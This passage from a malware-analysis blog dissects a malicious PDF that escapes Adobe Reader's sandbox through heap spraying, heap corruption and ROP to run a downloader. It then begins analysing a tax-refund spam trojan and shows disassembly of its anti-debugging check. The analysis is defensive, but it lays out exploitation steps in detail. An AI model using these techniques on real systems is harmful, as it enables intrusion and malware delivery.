<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3aXhvagXNzqtdvbxlAvXv-V9NanJ1DSYMNY8Vx30Um8E-J6gRzJ2VNbB58XNL8Eml9_7kd-nVkaEHiDft22u4dFWRQWCsqfT0sYimELrxWC3wBIp2XMixyR9i-VuAqYtvNspHci2pWGSb/s1600/DecryptionOpcodes.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3aXhvagXNzqtdvbxlAvXv-V9NanJ1DSYMNY8Vx30Um8E-J6gRzJ2VNbB58XNL8Eml9_7kd-nVkaEHiDft22u4dFWRQWCsqfT0sYimELrxWC3wBIp2XMixyR9i-VuAqYtvNspHci2pWGSb/s1600/DecryptionOpcodes.jpg" height="52" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4: Decryption loop</td></tr>
</tbody></table>
This particular code is XOR encrypted using the value 0x78EFEEA6<br />
<br />
Using the key, we now get a more "readable" code.<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJBIqw9-_b7m3tOIXYgmWap6wnI_AEi4HuoSq1Dw97UMW6MGPjiuSxKu1HnE_2oBvGjEJ3ITlvQ5Jf72OYekYQXtTkLgHwmnmopxMiK8jKjsTR1kpjOEaPypgPcvybGh4xgo4eSGWXDnat/s1600/decrypteddump.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJBIqw9-_b7m3tOIXYgmWap6wnI_AEi4HuoSq1Dw97UMW6MGPjiuSxKu1HnE_2oBvGjEJ3ITlvQ5Jf72OYekYQXtTkLgHwmnmopxMiK8jKjsTR1kpjOEaPypgPcvybGh4xgo4eSGWXDnat/s1600/decrypteddump.jpg" height="251" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5: Decrypted Shell Code</td></tr>
</tbody></table>
<br />
And now that the Shell code is decrypted, we can now verify the URL.<br />
<span style="font-family: 'Times New Roman', serif; font-size: 12pt; text-align: center;"><br /></span>
<span style="font-family: 'Times New Roman', serif; font-size: 12pt; text-align: center;">While harvesting the needed API's,
the following API's of interest were loaded:</span><br />
<div align="center" class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><div style="text-align: start;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx4a_erlWkaXm5fufFoBYSzxkgaVIEMlaEW7mDsSoRXG5OrkIMzAc6mFFZh3PCNpDZCrtGAnka2VHM-iTHzQkmpRQcYQKbxRWsk-LE88V_Fh-HsnhTmywyr3YU31NRSvmgb38Dx5UnAH2C/s1600/API_harvest_winexec.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx4a_erlWkaXm5fufFoBYSzxkgaVIEMlaEW7mDsSoRXG5OrkIMzAc6mFFZh3PCNpDZCrtGAnka2VHM-iTHzQkmpRQcYQKbxRWsk-LE88V_Fh-HsnhTmywyr3YU31NRSvmgb38Dx5UnAH2C/s1600/API_harvest_winexec.jpg" height="113" width="640" /></a></div>
</td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 6: API Harvest - Winexec</td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIs1pT-fa_7OgC4EDt2OI3BO1VN3chJNA3QDywHrQfwp_F7sVcVz0G0Gz4BxKnmS7AiFtCYXm6TIVWZSwEZzspe4ZrZrrP-sW0GQhFW6UJ82PDEKq3TMSNwgd7Y0e6BVqJZh2Q10817jVF/s1600/API_harvest_URLDownloadtocache.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIs1pT-fa_7OgC4EDt2OI3BO1VN3chJNA3QDywHrQfwp_F7sVcVz0G0Gz4BxKnmS7AiFtCYXm6TIVWZSwEZzspe4ZrZrrP-sW0GQhFW6UJ82PDEKq3TMSNwgd7Y0e6BVqJZh2Q10817jVF/s1600/API_harvest_URLDownloadtocache.jpg" height="137" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 7: API Harvest - URLDownloadToCacheA</td></tr>
</tbody></table>
<br />
This indicates that the shell code is a downloader and sure enough<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilqmeTvLYLFeFGoMILu6gJypdM9J-uUy7Bip-J_H3_5IhBM_tqrddSaigcgu_13-rpesIkC65sn7oNOMkconPRbX6ovpMz9QJt0sUMkO7IsQ2FgPsC9ALm6ZALKFpnA5hzaFLMdQDDjTTv/s1600/urldownloadtocachefilea.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilqmeTvLYLFeFGoMILu6gJypdM9J-uUy7Bip-J_H3_5IhBM_tqrddSaigcgu_13-rpesIkC65sn7oNOMkconPRbX6ovpMz9QJt0sUMkO7IsQ2FgPsC9ALm6ZALKFpnA5hzaFLMdQDDjTTv/s1600/urldownloadtocachefilea.jpg" height="152" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 8: API Usage - URLDownloadToCacheA</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinmhVI1oSziS0NDmpTSwKcWFxEu3i9jgKeI7zGuVK_Wr9p4GMvldcA5oMvULAP_W5pnBQEo2FTAWTxWNkjKpsbZSXyIxTEPQJyU0TQ8e_gtfJGWG9xSupLYtmoaskAUTGGL_HYU7zwZ84A/s1600/winexec.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinmhVI1oSziS0NDmpTSwKcWFxEu3i9jgKeI7zGuVK_Wr9p4GMvldcA5oMvULAP_W5pnBQEo2FTAWTxWNkjKpsbZSXyIxTEPQJyU0TQ8e_gtfJGWG9xSupLYtmoaskAUTGGL_HYU7zwZ84A/s1600/winexec.jpg" height="90" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 9: API Usage - Winexec</td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
The downloaded file is detected as "<span style="font-family: Calibri, sans-serif; font-size: 11pt;">Worm:Win32/Gamarue.AM</span>" by Microsoft<br />
<br />
----<br />
<br />
But wait, how can this even run when adobe reader runs in a sandbox environment?<br />
<br />
Before we continue, we will introduce a couple of terms to avoid confusion:<br />
<br />
<ul>
<li>Broker Process - Main PDF Process, spawns the Renderer process which loads the target PDF File</li>
</ul>
<ul>
<li>Renderer Process - AKA Sandbox : where the actual PDF is running.</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-Ts8ZJsZ2KYgX9JSkvxPgf0XSoDGTsUpBv9Hob-UkgHhbIaA1ygGTrJfVCu1AyNcPqUVwaAJWYSHfGdMKNo1fSE6VlobWm4r8E2LbKw7oX6RxpdhTHOKAmVzt-Rk-iKuTAuEuft68EjPb/s1600/Broker_and_Renderer.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-Ts8ZJsZ2KYgX9JSkvxPgf0XSoDGTsUpBv9Hob-UkgHhbIaA1ygGTrJfVCu1AyNcPqUVwaAJWYSHfGdMKNo1fSE6VlobWm4r8E2LbKw7oX6RxpdhTHOKAmVzt-Rk-iKuTAuEuft68EjPb/s1600/Broker_and_Renderer.jpg" height="166" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 10: AdobeReader seen in Process Explorer</td></tr>
</tbody></table>
The PDF file has limited access privilege while in the renderer process so a malicious PDF file must "break out" of the renderer process up to its parent process which is the broker process which in turn has a higher privilege level.<br />
<br />
The malicious PDF achieves EOP (Escalation Of Privilage) by doing the following:<br />
<br />
Allocate space and create heap spray by using the code shown on figure 11<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinCCu-OyfbWH0x9qF5ZyPXXE4NRCRhZtnYsfQNmaeC4g-6bUyWippieO2rvB458AMmfEqw54ECenmhTw0cRMZ8Xe3Y7MaDNd8JCo6TXUbWI7oeAtAOAwkConVbU2JviPSYtDq8hcQ-Ekjh/s1600/HeapSprayCreation.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinCCu-OyfbWH0x9qF5ZyPXXE4NRCRhZtnYsfQNmaeC4g-6bUyWippieO2rvB458AMmfEqw54ECenmhTw0cRMZ8Xe3Y7MaDNd8JCo6TXUbWI7oeAtAOAwkConVbU2JviPSYtDq8hcQ-Ekjh/s1600/HeapSprayCreation.jpg" height="120" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 11: Heap Spray creation</td></tr>
</tbody></table>
Heap spray code contains a minimalist version of the original shell code + padding with value 0x41 repeated over and over again as seen in Figure 12.1 and 12.2<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS-3KqzlpDT5zMTjgG0sngYNOfsdjSZ9Pf7LyZoR82NHdC8ECUp87W1wTk7bxEl_yjhsHdjeGP4fwRo_k2oORYWNgXqsyO3QKssB2QTIDoiabDrFw67UubMorgSKQwLJFSPTNyNm6tF2KF/s1600/HeapSpray1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS-3KqzlpDT5zMTjgG0sngYNOfsdjSZ9Pf7LyZoR82NHdC8ECUp87W1wTk7bxEl_yjhsHdjeGP4fwRo_k2oORYWNgXqsyO3QKssB2QTIDoiabDrFw67UubMorgSKQwLJFSPTNyNm6tF2KF/s1600/HeapSpray1.jpg" height="640" width="570" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 12.1 : Heap Spray contents</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7DCisxqTeOwuq8KvPjvOUJVZQkZ3KBfryWlYb2x3CfLSn48ZAIlU57_EbK1DeuCWuueEj6PVa_W5P3AOHq1kfypXP3W5Go0U-jqIJhUvP5t1OTQoDGn5WBd9VxX5-mt2prJQwvwcttolj/s1600/HeapSpray2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7DCisxqTeOwuq8KvPjvOUJVZQkZ3KBfryWlYb2x3CfLSn48ZAIlU57_EbK1DeuCWuueEj6PVa_W5P3AOHq1kfypXP3W5Go0U-jqIJhUvP5t1OTQoDGn5WBd9VxX5-mt2prJQwvwcttolj/s1600/HeapSpray2.jpg" height="640" width="569" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 12.2: Heap Spray contents</td></tr>
</tbody></table>
Heap Spray Broker process by using HttpSendRequestA and passing heap spray address under the parameters LpOptional with a size of 0x0C800000 under dwOptionalLength<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWrVZ9SAt44ALdcP71Rd2m-6-5eeYLYkbE3T4ZO8u-17k06rF4k0_zKG5fRkdNdvfgm4X1jC5t6B7Gb3Rf8XzMamHCrFAugLEgNIhIwE32Y4-ogzvtp6EoC8m-95QFQp_WcZsEZ9r3kQ2T/s1600/HTTPSendRequest.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWrVZ9SAt44ALdcP71Rd2m-6-5eeYLYkbE3T4ZO8u-17k06rF4k0_zKG5fRkdNdvfgm4X1jC5t6B7Gb3Rf8XzMamHCrFAugLEgNIhIwE32Y4-ogzvtp6EoC8m-95QFQp_WcZsEZ9r3kQ2T/s1600/HTTPSendRequest.jpg" height="440" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 13 : Heap Spraying the Broker process VIA HttpSendRequest</td></tr>
</tbody></table>
If we look at the broker process at this point, we see the initially created Heap Spray is now present.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVqjb4Uo1Im-ZAS4G93m9pHcCU3vaZFUEIwF-_D5BB8tlz27L5JiKGpM6xV7kGX8ntpGztwwTfe3ilzv9J2gtd371usNuERW9OtcDttEDXmOwXbACi4Sz6PQdsfA5IsllF6FjiA4kM4s0l/s1600/HeapAtBroker.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVqjb4Uo1Im-ZAS4G93m9pHcCU3vaZFUEIwF-_D5BB8tlz27L5JiKGpM6xV7kGX8ntpGztwwTfe3ilzv9J2gtd371usNuERW9OtcDttEDXmOwXbACi4Sz6PQdsfA5IsllF6FjiA4kM4s0l/s1600/HeapAtBroker.jpg" height="535" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 14: Memory Map at Broker Process</td></tr>
</tbody></table>
To ensure that the heap spray will be called GlobalAlloc is called (Figure 15) and created heap will be overwritten with target address (0x8080020) and pass one of the address in RegisterWindowMessageW (Figure 16).<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirWisuodel_NiDfV9eUhyphenhyphenQ3Fyj3yDaMwJt63XA0dblJJHauTXcwiqamcOyyRBVypCsvRbl1XgWdzvNtHU6ySARnPou8f9A_C9wgUJYzkBtUCDj5Ige4yAJMRGNWFxkHKXn1JkcguK14NMd/s1600/HeapOverwrite.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirWisuodel_NiDfV9eUhyphenhyphenQ3Fyj3yDaMwJt63XA0dblJJHauTXcwiqamcOyyRBVypCsvRbl1XgWdzvNtHU6ySARnPou8f9A_C9wgUJYzkBtUCDj5Ige4yAJMRGNWFxkHKXn1JkcguK14NMd/s1600/HeapOverwrite.jpg" height="584" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 15: Crafted Heap</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuaa8DqImABDbFEOX0npVVEVzlAzGGMCN6EKyw_l-Q5oNa3HNGGw9VNpc4zBihSnuZtkjSp8dOXbdxvGCoLYkTlpYLPj5k5BOlYVwH9RPEiUsGQmuLVVQqfKJR39knyyKcrHUhpm4Lbsl4/s1600/RegisterWindowsMesssageW.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuaa8DqImABDbFEOX0npVVEVzlAzGGMCN6EKyw_l-Q5oNa3HNGGw9VNpc4zBihSnuZtkjSp8dOXbdxvGCoLYkTlpYLPj5k5BOlYVwH9RPEiUsGQmuLVVQqfKJR39knyyKcrHUhpm4Lbsl4/s1600/RegisterWindowsMesssageW.jpg" height="143" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 16: RegisterWindowsMessageW Usage</td></tr>
</tbody></table>
Now the malicious PDF corrupts the broker process heap by using GetclipboardFormatA and setting the size to a large value<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbybMvgZL4_C7UYbL_8t2d6HmD4uzMhdNgxfuTf3uHGuch35LtuEd90mMQ49u4KsJ4AnvCAbXxkCYQqb8y2Pn983Y3Mt5SDz5GgHePcF8Fs5ZrGiPXeOhtkzPuEbxOmv4r7WHNVOI9kBr4/s1600/API_harvest_GetClipboardFormatNameA.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbybMvgZL4_C7UYbL_8t2d6HmD4uzMhdNgxfuTf3uHGuch35LtuEd90mMQ49u4KsJ4AnvCAbXxkCYQqb8y2Pn983Y3Mt5SDz5GgHePcF8Fs5ZrGiPXeOhtkzPuEbxOmv4r7WHNVOI9kBr4/s1600/API_harvest_GetClipboardFormatNameA.jpg" height="181" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 17: API Harvest - GetClipboardFormatNameA</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0sqmNiqGxCwYavJ0GunpJE78sOEdHQRNrKDmFYMaaMDO4YHsB1QLu0rhSdba0YEQJwtHJV6-eQLw5oMilNlklzY342bL7DtuQ5FiLiahqA2zT_Vv8TUQevQV5XMREf4y_vCsUZz4Z8bGG/s1600/GetClipBoardFormatA.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0sqmNiqGxCwYavJ0GunpJE78sOEdHQRNrKDmFYMaaMDO4YHsB1QLu0rhSdba0YEQJwtHJV6-eQLw5oMilNlklzY342bL7DtuQ5FiLiahqA2zT_Vv8TUQevQV5XMREf4y_vCsUZz4Z8bGG/s1600/GetClipBoardFormatA.jpg" height="150" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 18 : GetClipboardFormatNameA usage</td></tr>
</tbody></table>
Due to the size passed, broker process will call GetClipboardFormatNameW instead<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK-otIlucVHWL_oZ4HRWKI4aZC553Ujggeq1XxahZDvQQO9ZCVHbgzPtTgR_HcVs3wdgJ9pAdEI_29TnPEC-f2GX2j-K5H-jMD66B8zcwSn66I-ZqP7mOmeVHQZQNyPF2yI_GA2u-QIMIU/s1600/GetClipBoardFormatW_Broker.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK-otIlucVHWL_oZ4HRWKI4aZC553Ujggeq1XxahZDvQQO9ZCVHbgzPtTgR_HcVs3wdgJ9pAdEI_29TnPEC-f2GX2j-K5H-jMD66B8zcwSn66I-ZqP7mOmeVHQZQNyPF2yI_GA2u-QIMIU/s1600/GetClipBoardFormatW_Broker.jpg" height="212" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 19: Heap Before GetClipboardFormatNameW in Broker Process</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMXEBYFWcTME-8dzmH0PmBUUyiRYadX64NPq8uT2R0Q4fLcAzLcRbGsNvpMAs2KMt-vZNtnVXnuac_JWjLrbBpwH1qOJB4vJ6BUbSwU3wCX6ezedMpCHTPrshx1w6huwmClZlRsdw9Eveu/s1600/GetClipBoardFormatW_Broker_After.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMXEBYFWcTME-8dzmH0PmBUUyiRYadX64NPq8uT2R0Q4fLcAzLcRbGsNvpMAs2KMt-vZNtnVXnuac_JWjLrbBpwH1qOJB4vJ6BUbSwU3wCX6ezedMpCHTPrshx1w6huwmClZlRsdw9Eveu/s1600/GetClipBoardFormatW_Broker_After.jpg" height="232" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 20: Heap Result after GetClipBoardFormatNameW in Broker Process</td></tr>
</tbody></table>
Access corrupted IPC (Inter Process Call) by abruptly returning back to renderer process<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbYdAwYvYLC48uif1zcQC_qGmG3leeADhJAX-MH-SqSmBoC64BvWIA5ui_5wSZpfembzsm4Za9mhtFQrX_vN5R3o_Z2O-bSs1knuP7tZO4SoByy81-USD6HfZO6uCO1W9DPw8Nu49GsumE/s1600/ForcebackToRenderer.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbYdAwYvYLC48uif1zcQC_qGmG3leeADhJAX-MH-SqSmBoC64BvWIA5ui_5wSZpfembzsm4Za9mhtFQrX_vN5R3o_Z2O-bSs1knuP7tZO4SoByy81-USD6HfZO6uCO1W9DPw8Nu49GsumE/s1600/ForcebackToRenderer.jpg" height="55" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 17: Force back to Renderer process</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnnn0zuYkhxP72e8jQdaROLwYy1n-5BUhhltviU_GFTZUPgF1RDZYGwY0aERY_AXpi7CqqJt7nt1T2YDBNhO0NZxKq3zHs0CbjbERwHRTpevrvrB79UfI3CMSgpldSyWSh2vHwnDj1iZ6F/s1600/SignalObjectAndWait.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnnn0zuYkhxP72e8jQdaROLwYy1n-5BUhhltviU_GFTZUPgF1RDZYGwY0aERY_AXpi7CqqJt7nt1T2YDBNhO0NZxKq3zHs0CbjbERwHRTpevrvrB79UfI3CMSgpldSyWSh2vHwnDj1iZ6F/s1600/SignalObjectAndWait.jpg" height="50" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 21: SignalObjectAndWait - The final touch</td></tr>
</tbody></table>
<br />
At this point, the broker process is now running the heap spray code.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqsSi3eC5ypQP0swzoeKmo77uCNwbJYtlFBHhRKf0Q1MZf687V2XvuBvOxYd2ML8Lt-BnlCVmmONWSNP7E49EQXrwOVavARlKz1gYn-PtIaJLHbZdPHeaTWzvGqkCp4v2wbM7evlEAP2B0/s1600/Precheck_Heapspray.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqsSi3eC5ypQP0swzoeKmo77uCNwbJYtlFBHhRKf0Q1MZf687V2XvuBvOxYd2ML8Lt-BnlCVmmONWSNP7E49EQXrwOVavARlKz1gYn-PtIaJLHbZdPHeaTWzvGqkCp4v2wbM7evlEAP2B0/s1600/Precheck_Heapspray.jpg" height="214" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 22 : Calling ROP</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2v5wKiyHpeYcsdeWerJ6tHvNDd2gjAhbAGvbk5czLG8mqwdzeG4g8qD2RxaGxTd-0F2MMyglJseJ-fZN97pJ-1BKGO4hschWr9xygIzISfPuGjjMahb2XwM5hVyjTDG8FbU6VcHyjkTgu/s1600/Jumping_to_Heapspray.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2v5wKiyHpeYcsdeWerJ6tHvNDd2gjAhbAGvbk5czLG8mqwdzeG4g8qD2RxaGxTd-0F2MMyglJseJ-fZN97pJ-1BKGO4hschWr9xygIzISfPuGjjMahb2XwM5hVyjTDG8FbU6VcHyjkTgu/s1600/Jumping_to_Heapspray.jpg" height="105" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 23: ROP back to shell code</td></tr>
</tbody></table>
The author suggests the users update to the latest adobe reader version to for them not to be affected by this exploit<br />
<ul>
</ul>
<br />
<div>
<br /></div>
<br />Wren Fer Balangcodhttp://www.blogger.com/profile/11892442983440016445noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-14299002654310544422014-07-08T18:58:00.000-07:002014-07-08T18:58:59.771-07:00SPAM: Taxes, allowances and tax creditsI received a new spam mail quite recently stating that I can claim a tax refund. What caught my attention is that it says I have a tax refund from US even if in actuality I have never worked nor paid taxes in the US.<br />
Here is a screenshot of the spam mail.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5GH8I1QlpeQmBSnrEq6ODpJtTzSbjUhOu5j5YTdaDe_-v89ldOmwgxJqbprNXMN6Qnvf_ZFqmAfAb8S4uMP-qRxF2JO9DBPO_akHg9dlQEfr79zEuwhDvSWMr0ksgkdGOtfJII80O/s1600/spam_mail.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5GH8I1QlpeQmBSnrEq6ODpJtTzSbjUhOu5j5YTdaDe_-v89ldOmwgxJqbprNXMN6Qnvf_ZFqmAfAb8S4uMP-qRxF2JO9DBPO_akHg9dlQEfr79zEuwhDvSWMr0ksgkdGOtfJII80O/s1600/spam_mail.png" height="271" width="320" /></a></div>
<br />
This mail has an archived file attached “Refund-Form-ID_0842893.zip” claiming to be a form in which I need to complete and submit for issuance of the said tax refund.<br />
<br />
Inside the zip file is a malicious executable file named “Tax_76483691535948579.elc.exe” and is detected by ThreatTrack’s Vipre as Trojan.Win32.Zbot.qu (v) (but most commonly known as Andromeda by some).<br />
<br />
This malware is closely related or should I say an updated version of the malware spam previously analyzed by my colleague in http://www.antimalwarelab.com/2014/05/spam-mail-from-fake-fedex.html.<br />
<br />
<h3>
ANTI-DEBUGGING</h3>
<br />
Checks for process names to avoid, hashes them using ntdll.RtlComputeCrc32 and compares it to a table of CRC32-hashes within its body. Previous version of this malware uses direct comparison of hashes, now it uses a table where it loops and checks for the hash values listed in the table.<br />
<br />
<blockquote class="tr_bq">
seg000:000011E8 call CreateToolhelp32Snapshot<br />
…<br />
…<br />
seg000:0000120B call Process32First<br />
…<br />
…<br />
seg000:0000121A _checkNextProc: ; CODE XREF: DebugCheck+B9j<br />
seg000:0000121A xor edi, edi<br />
seg000:0000121C cmp [ebp+var_210], bl<br />
seg000:00001222 jz short loc_124D<br />
seg000:00001224<br />
